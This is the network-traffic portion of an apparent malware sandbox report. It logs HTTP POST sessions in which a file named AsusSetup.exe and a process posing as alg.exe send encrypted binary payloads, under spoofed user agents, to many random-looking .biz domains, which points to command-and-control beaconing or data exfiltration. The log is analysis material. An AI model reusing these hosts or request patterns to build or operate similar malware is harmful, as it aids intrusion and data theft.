                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=9a38974a2b1241daed946f4945d8acb9|155.94.241.188|1730130600|1730130600|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49706 | 18.141.10.107 | 80 | 5880 | C:\Users\user\Desktop\AsusSetup.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:50:00.026778936 CET | 344 | OUT | POST /w HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ssbzmoy.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 800
Oct 28, 2024 16:50:00.026796103 CET | 800 | OUT | Data Raw: 20 9e 33 7b fe 11 f6 1f 14 03 00 00 9c 1a 1f c1 70 e4 e9 87 95 48 8d 15 fb 42 f2 8e 85 04 da 40 90 3c bb 7f f4 04 35 41 56 d1 05 ef 3b e6 ed 9a 59 11 05 29 32 d2 4d 8c d0 94 f9 02 ac f3 b9 db c0 3a f2 f6 1f 81 f3 15 6f 9e b1 45 9b a8 ea 5f 2c c8
Data Ascii: 3{pHB@<5AV;Y)2M:oE_,POCng4MC2b7}FUI gW4sO!RZ/&}6FrQ9dMQ7EBpF)Q%bH+MD3oE*\'
Oct 28, 2024 16:50:01.442179918 CET | 415 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 28 Oct 2024 15:50:01 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=b6e9e4a8fe7c778823bdd60f3f41b2b3|155.94.241.188|1730130601|1730130601|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49707 | 18.141.10.107 | 80 | 2636 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:50:00.939378023 CET | 346 | OUT | POST /flh HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ssbzmoy.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 28, 2024 16:50:00.939480066 CET | 778 | OUT | Data Raw: b2 e2 66 0d 35 59 47 e0 fe 02 00 00 c0 35 59 ef 93 1c cc 8f b2 3f c8 bb 01 a6 d7 fa f8 81 44 82 d7 d1 61 ab c4 7c 6a 91 52 a1 1d f7 92 98 93 e9 c1 4c c8 91 e6 b1 f5 61 69 32 cd d9 ba 94 74 c3 f3 fe d6 c7 3c ee 2c 7b 4e 8f cd 91 2f 91 44 c1 88 32
Data Ascii: f5YG5Y?Da|jRLai2t<,{N/D2lryHmIN>,ZKR+@0LrpsX/-^(<EPe$.i9>fRHnf-Y2aLL1GcC<r @>9\7[,:W^>&i^b|WYQ
Oct 28, 2024 16:50:02.377466917 CET | 415 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 28 Oct 2024 15:50:02 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=49463987e232f86878a2b5945c96d660|155.94.241.188|1730130602|1730130602|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  4192.168.2.54970854.244.188.177805880C:\Users\user\Desktop\AsusSetup.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:01.648710012 CET353OUTPOST /nxfilvvdujkp HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: cvgrf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 800
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:01.648732901 CET800OUTData Raw: db ce d1 20 5d 99 ba c9 14 03 00 00 88 5c 03 ee 05 e6 0b b8 ba 70 57 7f 14 cf bf 2e 42 b2 a3 a1 2e ae 4b 0b f8 82 2b 9a f6 6a e2 9d 72 50 3b dc d5 8d 35 04 f6 ee 0c 25 14 50 b6 01 03 48 b9 d7 ef 31 a5 57 fe 13 43 c0 d8 c9 c0 82 e2 9d 3b 12 9e fd
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: ]\pW.B.K+jrP;5%PH1WC;v$a6g."]V9=\SUg,m8f~q.BU+^{McV+If<F|uMD\YLw}83]r r*jJ92o^LQ
Oct 28, 2024 16:50:02.469491005 CET  413  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:50:02 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=7397ba36972b2f822a61f8a0cd836c25|155.94.241.188|1730130602|1730130602|0|1|0; path=/; domain=.cvgrf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
5  192.168.2.5  49709  44.221.84.105  80  5880  C:\Users\user\Desktop\AsusSetup.exe
Timestamp  Bytes transferred  Direction  Data
Oct 28, 2024 16:50:02.698465109 CET  351  OUT  POST /vicdeig HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: npukfztj.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 800
Oct 28, 2024 16:50:02.698534966 CET  800  OUT  Data Raw: 36 1c 7d 51 5d 4f 2b b0 14 03 00 00 3a bf d9 6b 7a 4d 7d ff 0a 48 eb 52 dc 5f 69 be 19 c3 ad b1 ba 8b 2e 31 c2 b9 ee ab 1d ec 93 b2 fa 8a 94 8a bb 1f 7c 1c 85 af 6b 04 bb fd 92 b4 3f 36 cf 53 d2 03 c5 46 23 65 d3 a0 f7 18 94 0b c8 6f 72 07 47 0e
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 6}Q]O+:kzM}HR_i.1|k?6SF#eorGcqZOHPT'J\pcgm*|b'wD%$6}`7sZP'8pQ*+Ke0|B 'jC#c@qS@g?WL/_u\.j`O5=-3:*V
Oct 28, 2024 16:50:03.372359991 CET  416  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:50:03 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=1e495fd4dc936563b16c046c19d20d4e|155.94.241.188|1730130603|1730130603|0|1|0; path=/; domain=.npukfztj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
6  192.168.2.5  49710  54.244.188.177  80  2636  C:\Windows\System32\alg.exe
Timestamp  Bytes transferred  Direction  Data
Oct 28, 2024 16:50:02.740437031 CET  352  OUT  POST /fwyvvonbgan HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: cvgrf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
Oct 28, 2024 16:50:02.740464926 CET  778  OUT  Data Raw: cf 73 3d 31 0e 3b 98 42 fe 02 00 00 d6 d9 9c 1d 16 19 8e 28 b9 45 10 31 64 46 c5 2b 01 3f b2 d7 21 d0 f3 9d 7d 84 11 ae d8 e3 40 80 05 a7 d3 bf e2 eb a4 4e 52 67 24 36 1a 85 58 82 e3 8a 69 21 f0 a9 a0 eb 58 d6 2b d8 bf b2 04 0e cc be 15 f0 de f5
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: s=1;B(E1dF+?!}@NRg$6Xi!X+t/{Pj[Jmd.Aiz:~H[@b|7E9bcysLs6*bnrZ>WV"fS*QRevOWu011\
Oct 28, 2024 16:50:03.586586952 CET  413  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:50:03 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=bcf348874fdd29f1f5d8a01d467a14cb|155.94.241.188|1730130603|1730130603|0|1|0; path=/; domain=.cvgrf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
7  192.168.2.5  49711  44.221.84.105  80  2636  C:\Windows\System32\alg.exe
Timestamp  Bytes transferred  Direction  Data
Oct 28, 2024 16:50:03.920277119 CET  354  OUT  POST /wurutvkart HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: npukfztj.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
Oct 28, 2024 16:50:03.920291901 CET  778  OUT  Data Raw: 2c d9 eb 98 54 85 b5 11 fe 02 00 00 d4 7d 98 bc fb c3 74 7d e8 07 b4 d3 23 83 13 a3 c2 7b f4 3a 2c 7b 35 4b 27 9f 36 27 d6 70 4c 9a 3a 86 fd 94 d8 32 e4 d1 41 06 aa 9e b5 54 1b 9c f6 95 8f b9 b4 82 18 bb 95 8a f8 0b fd 5e 83 4c bb 69 76 0f e4 c5
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: ,T}t}#{:,{5K'6'pL:2AT^LivvP2}n-,_+m`@+:4sHyl'kr+a Y0*orqkT&'V3q%</Q^&<9E0;de|ku~QH6d;|!~
Oct 28, 2024 16:50:04.587095022 CET  416  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:50:04 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=d8788308211fdad16be0ff16da725d09|155.94.241.188|1730130604|1730130604|0|1|0; path=/; domain=.npukfztj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.5 | 49713 | 172.234.222.138 | 80 | 2636 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:50:04.656956911 CET | 354 | OUT | POST /agsaomftijm HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: przvgke.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.5 | 49719 | 172.234.222.138 | 80 | 2636 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:50:05.416445971 CET | 349 | OUT | POST /hogxps HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: przvgke.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.5 | 49720 | 18.141.10.107 | 80 | 2636 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:50:06.195262909 CET | 355 | OUT | POST /suoyjqbsciv HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: knjghuig.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 28, 2024 16:50:07.635282040 CET | 416 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 28 Oct 2024 15:50:07 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=cd7b08626de924756b135ad51607bc47|155.94.241.188|1730130607|1730130607|0|1|0; path=/; domain=.knjghuig.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.5 | 49730 | 82.112.184.197 | 80 | 2636 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:50:07.821641922 CET | 350 | OUT | POST /uuoiubsg HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: lpuegx.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.5 | 49780 | 82.112.184.197 | 80 | 2636 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:50:16.353391886 CET | 356 | OUT | POST /dnirvyhujqwqnc HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: lpuegx.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:16.353420019 CET778OUTData Raw: 9d 30 e5 ab 1a 3a 81 ea fe 02 00 00 22 95 92 75 29 20 d0 50 28 a8 3c 5c 75 86 18 1d 87 04 66 2d cf 81 cc cb 5b 90 a0 c8 cb ae 0f 9c 5f 4a 95 96 67 92 47 3d 29 d7 00 f1 b1 11 c1 54 64 d8 0b 0d ee ed 9e 80 2f 4d a2 b8 f8 73 54 88 3d 09 d2 65 7a 01
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0:"u) P(<\uf-[_JgG=)Td/MsT=ezF^`kYYL.2+!oXuh%1rdn!}%\' dUOox0-#Y'`L-(KcC(mv!IT,"%GWt


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.5 | 49830 | 82.112.184.197 | 80 | 2636 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:50:24.924645901 CET | 361 | OUT | POST /tkrvouqomflftlqp HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: vjaxhpbji.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:24.924668074 CET778OUTData Raw: d8 fc 79 b6 8f 46 8f db fe 02 00 00 6f 9f b6 50 4f 40 83 b0 fc b3 a3 6f 80 9b 38 1e 72 79 3c cc e2 de 83 a0 d7 ad dd 1e 19 bc 30 ad a8 44 03 b4 d4 65 51 69 ff 1b ce 62 e1 45 61 31 45 9a c4 72 04 93 5b 1e 72 79 9b c8 f1 e4 56 58 a3 63 09 9d 3f b1
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: yFoPO@o8ry<0DeQibEa1Er[ryVXc?fHmU LjAmQyp6_t0-JYr@\GR.!9M8#R^d:]%t%Hs/q'f{&l;,@]$?/_sY9.n


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.5 | 49873 | 82.112.184.197 | 80 | 2636 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:50:33.465249062 CET | 352 | OUT | POST /bdrtsxy HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: vjaxhpbji.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:33.465286970 CET778OUTData Raw: df 01 8b cd 5a e6 15 c1 fe 02 00 00 c2 e7 9b 5f ee e1 6b ff 3e 98 17 5a 2f 47 90 38 ba 74 7e fd ab 9d 1f 32 e5 df 22 90 f4 31 ef 57 22 40 1f b2 34 61 2c 32 78 e5 c2 54 3d e7 f1 d2 24 f5 47 14 9e 9f d2 ef 6c e5 da 2e 2c 87 9d 09 c8 de 05 55 bb c5
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: Z_k>Z/G8t~2"1W"@4a,2xT=$Gl.,Uh!`vu4*<ys%KH*dFCMd9/p8ajWfADRg.ahxE})u$IJd4N`8^xbvQxPR)nd%fQxrQ6}n


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.5 | 49919 | 47.129.31.212 | 80 | 2636 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:50:42.274624109 CET | 346 | OUT | POST /len HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: xlfhhhm.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:42.274646044 CET778OUTData Raw: 7b 49 91 8e 45 89 34 c0 fe 02 00 00 ec 8d 65 02 ab cc 34 0b 94 75 c6 06 dd c2 91 52 3f 5b 25 4f f3 b5 61 3a e7 ba 6e 26 82 5a a7 84 5e 37 f2 ac 6e fe d6 26 78 f3 5e cf 86 33 35 43 c9 27 11 d4 42 c6 0e fb 42 29 07 8c 1e 7c 5f 04 80 bd b1 9c 0d 4f
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: {IE4e4uR?[%Oa:n&Z^7n&x^35C'BB)|_O]BtVjo&,.4&!o;k/HLHpeONr+2_vcraMrmI/pz{HAez2\w^9?"?Bf-iKRUTg+}Ae=Micz!
Oct 28, 2024 16:50:43.717546940 CET | 415 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 28 Oct 2024 15:50:43 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=7f5735b7ed980352ecdf63e68f3ce356|155.94.241.188|1730130643|1730130643|0|1|0; path=/; domain=.xlfhhhm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.5 | 49930 | 13.251.16.150 | 80 | 2636 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:50:44.138880014 CET | 358 | OUT | POST /ubaevhdsrbjcmaql HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ifsaia.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:44.138880014 CET778OUTData Raw: fe 36 68 32 e2 1c 3a 6a fe 02 00 00 12 b6 ee 11 a2 a9 5c 3c 5b 35 70 5e 88 9a 2c 4a 54 92 eb c0 4c 25 7a 55 dc a2 dc 9b 3b 58 41 53 ac 69 a9 20 20 4a 8a 0b 79 94 05 88 7a eb 1c 4b 7e 4d ed be fc 53 17 f7 20 98 69 e8 5c e5 d3 08 96 e8 77 c7 a8 d1
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 6h2:j\<[5p^,JTL%zU;XASi JyzK~MS i\w6Xw"N}fTQE89?$EX;J|4 m"813\. pb_5wb?;g/_$!L# g\{nV$<W|*:U/
Oct 28, 2024 16:50:45.564770937 CET | 414 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:50:45 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=178d9167f2d65bee40964bd354bca56b|155.94.241.188|1730130645|1730130645|0|1|0; path=/; domain=.ifsaia.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.5 | 49941 | 44.221.84.105 | 80 | 2636 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:50:45.907524109 CET | 348 | OUT | POST /yeb HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: saytjshyf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:45.907537937 CET778OUTData Raw: b9 32 ca 6b fe d5 ce d7 fe 02 00 00 d1 28 a2 65 00 4f 06 74 7e 90 07 37 cc f8 45 2a a7 50 a0 82 2b fb da 9a e4 79 2d 44 15 c0 91 55 cf f9 66 40 46 25 e7 3e 83 13 6a ec 4b 79 eb 83 d8 72 d3 db ed 62 ed 5b d9 ca 34 cf db b0 91 86 5a 2d 81 25 d3 9f
